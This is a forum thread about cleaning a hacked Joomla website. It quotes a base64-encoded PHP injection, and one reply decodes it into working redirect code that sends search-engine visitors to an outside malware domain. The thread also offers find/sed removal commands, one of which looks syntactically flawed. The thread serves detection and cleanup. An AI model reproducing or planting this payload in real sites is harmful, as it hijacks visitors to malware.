Find and replace command

[livicrew]

Hi guys,

Recently I needed to clean up hacked code on my webserver, I used the following to find the base64 coding

Code: Select all

find . -type f -name "*.php" -exec grep -H "eval(base64decode)DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokbmNjdj1oZWFkZXJzX3NlbnQoKTsNCmlmICghJG5jY3Ypew0KJHJlZmVyZXI9JF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddOw0KJHVhPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvb2dsZSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ5YW5kZXgucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibWFpbC5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFzay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJtc24iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlIikpIHsNCglpZiAoIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImludXJsIikpewkJDQoJCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9uZXd5cmZocmguYmlqLnBsLyIpOw0KCQlleGl0KCk7DQoJfQ0KfQ0KfQ==" {} \; > potentially_infected_files.txt

This gave me a list of infected files, I then manually deleted the scripting.

How could I use this command (or SED) to find the code in every file on the server and then replace it with a space?

Possibly a script I can run manually when I am suspicious of a compromisation.
Any help would be much appreciated.

[Habitual]

Code: Select all

find -name "*.php" -type f -exec sed -i 's/<?php \/**\/ eval(base64_decode("DQplcn.*?>//g' {}\;

should remove them/it.

YMMV. Make backups.

[Habitual]

BTW:

That reads

Code: Select all

$nccv=headers_sent();
if (!$nccv){
$referer=$_SERVER['HTTP_REFERER'];
$ua=$_SERVER['HTTP_USER_AGENT'];
if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing") or stristr($referer,"yandex.ru") or stristr($referer,"rambler.ru") or stristr($referer,"mail.ru") or stristr($referer,"ask.com") or stristr($referer,"msn") or stristr($referer,"live")) {
	if (!stristr($referer,"cache") or !stristr($referer,"inurl")){		
		header("Location: http://newyrfhrh.bij.pl/");
		exit();
	}
}
}

which comes from

Code: Select all

echo <long_string_after_'"eval(base64decode)" | base64 -d

[livicrew]

Thanks for that, I will make very good use of it.

How did you 'read' the file ?? Also, can I find the password he used in his script?

I read this and the guy managed to read the password blog.kejsarmakten.se/all/software/2011/01/14/malware-in-joomla.html This was the exact hack I had.

This would be useful, as I could delete every backdoor onto my website using his script.

Thanks again

Peter

[Habitual]

Peter:

So you are running Joomla?
You do realize that all PHP scripts are now suspect?
This is shared hosting or not?

I 'found' it with terminal >

Code: Select all

echo DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokbmNjdj1oZWFkZXJzX3NlbnQoKTsNCmlmICghJG5jY3Ypew0KJHJlZmVyZXI9JF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddOw0KJHVhPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvb2dsZSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ5YW5kZXgucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibWFpbC5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFzay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJtc24iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlIikpIHsNCglpZiAoIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImludXJsIikpewkJDQoJCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9uZXd5cmZocmguYmlqLnBsLyIpOw0KCQlleGl0KCk7DQoJfQ0KfQ0KfQ== | base64 -d

Password...? It's a common redirect that says "you're going to visit http://newyrfhrh.bij.pl/ "if you come from {list_of_referrers]
"It took us a long time to notice the attack since the only visible change they made to the website was to redirect google searches from our website to malware websites in Poland."
This is a first step in many attacks but it is actually the Symptom of a hack. What does

Code: Select all

find `pwd` . -name z.php -exec less {} \;

show us?
The password is usually hard-coded in php file somewhere (in clear or obfuscated text).

Is http://blog.kejsarmakten.se/all/softwar ... oomla.html your article?

Tighten up Joomla if you run it and never run joomla if you don't.
More holes than a Microsoft Product IMO.
Only thing worse is telnet.

Joomla gallery components are a popular target.

I learned 80% of this by extensive reading at
http://blog.unmaskparasites.com/ and
http://25yearsofprogramming.com/blog/

Lemme know...

Subscribed with interest...

JJ

[livicrew]

Hi

It's not my article, I found it while working on my hack on my joomla website. It appears the com_oziogallery had a backdoor, I have removed ozio. Also I use coppermine galleries which also had/has a backdoor, I have the latest version, but still not sure how secure it is.

I am on shared hosting.

[Habitual]

Peter:

... Also, can I find the password he used in his script?

Terminal >

Code: Select all

find `pwd` . -type f -name "*.php" -exec grep $auth_pass {} \;

IF you get a "63a9f0ea7bb98050796b649e85481845" in the output/string, the password is "root" (no quotes)

...as I could delete every backdoor onto my website using his script.

Without better Joomla security, it will just come right back.

All Files except .cgi should be 644
All directories should be 755

Shared hosting. Ugh.

Should you decide that you need a more in-depth investigation and solution, send me a PM with your everyday email address and we can continue discussing your Security and/or remedy.

JJ

[Habitual]

Peter:

...It appears the com_oziogallery had a backdoor, I have removed ozio. Also I use coppermine galleries which also had/has a backdoor, I have the latest version, but still not sure how secure it is.

Got backup?

[livicrew]

Thanks for that. I will keep my eye on it and if I need help, I will give you a shout.

Maybe I should go back to a 'normal' website and drop Joomla !

[Habitual]

Peter:

Check your PMs...